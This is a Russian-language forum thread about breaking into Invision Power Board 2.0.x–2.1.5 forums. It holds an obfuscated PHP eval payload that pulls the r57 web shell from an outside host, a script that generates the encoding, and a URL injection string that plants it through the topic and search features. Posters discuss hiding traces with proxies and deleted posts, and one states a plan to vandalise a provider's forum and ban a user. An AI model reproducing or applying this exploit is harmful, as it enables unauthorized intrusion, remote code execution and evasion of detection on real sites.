Вот шелл для ипб 2.0.х - 2.1.5. Code: eval( chr(105). chr(110). chr(99). chr(108). chr(117). chr(100). chr(101). chr(32). chr(34). chr(104). chr(116). chr(116). chr(112). chr(58). chr(47). chr(47). chr(114). chr(115). chr(116). chr(46). chr(118). chr(111). chr(105). chr(100). chr(46). chr(114). chr(117). chr(47). chr(100). chr(111). chr(119). chr(110). chr(108). chr(111). chr(97). chr(100). chr(47). chr(114). chr(53). chr(55). chr(115). chr(104). chr(101). chr(108). chr(108). chr(46). chr(116). chr(120). chr(116). chr(34). chr(59). chr(47). chr(42). chr(32) ); // Значиццо выглядит это так : Code: <?php $str="include \"http://rst.void.ru/download/r57shell.txt\";/*";// */ echo "eval( "; for($i=0;$i<strlen($str);$i++) { echo "chr(".ord($str[$i])."). "; } echo "chr(".ord(" ").") ); //"; ?> Тут созревает вопрос : шелл заливается через создание темы, поиск темы, и добавки кода вызова шелла : Code: &lastdate=z|eval.*?%20//)%23e%00 Тоесть, если я сменю состав сообщения, вместо кода я впишу 123 и код вытру - то шелл не будет присутствовать не серве, тем самым следы можно замести? Я так понимаю хак работает через внешний шелл и не подгружает его в сам форум.
Я имею ввиду - то что в админке будет виден заход другого админа это да, но например администрация серва - она как догадается что форум открыли именно через этот шелл?
Всмысле проникли в админку ну и так далее - по выбору. Будет видно что новый админ появился, и всё, верно? То что именно р57 шелл юзали, не будет видно?
Ну да, находится на rst, а выполняется на жертве. Просто залей через него локальный шелл и потри сообщение.
Я просто хочу на одном форуме провайдера, вытереить один раздел форум и забанить 1 юзера, ну не хочу чтоб меня запалили под этим делом. Под прокси всё буду делать, потом тему с кодом шелла вытру полностью. Так не запалят?